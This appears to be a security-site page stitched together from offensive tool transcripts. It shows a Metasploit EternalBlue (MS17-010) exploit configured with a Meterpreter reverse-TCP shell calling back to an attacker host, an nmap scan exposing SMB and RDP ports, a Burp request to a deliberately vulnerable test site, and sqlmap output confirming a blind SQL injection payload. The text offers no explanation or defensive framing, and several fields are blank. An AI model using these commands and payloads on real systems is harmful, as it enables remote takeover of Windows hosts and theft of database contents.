Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Version: 1.0
Author: www.tutusec.com
Platform: Windows
Targets: multiple Windows versions
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
msf exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >
Nmap - network scanning tool
Starting Nmap 7.92 ( https://nmap.org ) at
Nmap scan report for 192.168.1.0/24
Host is up (0.0012s latency).
Not shown: 251 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
443/tcp open https Microsoft IIS httpd 7.5
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Service
nmap >
Burp Suite Professional
Request
GET / HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 200 OK
Date:
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.30-0+deb8u1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
testphp.vulnweb.com - Free PHP vulnerability test site
sqlmap - automated SQL injection tool
sqlmap 1.5.2 - automatic SQL injection and database takeover tool
https://sqlmap.org
[*] starting @
[INFO] testing connection to the target URL
[INFO] checking if the target is protected by some kind of WAF/IPS
[INFO] testing if the URL is stable
[INFO] target URL is stable
[INFO] testing if GET parameter 'id' is dynamic
[INFO] GET parameter 'id' is dynamic
[INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[INFO] GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8747=8747
---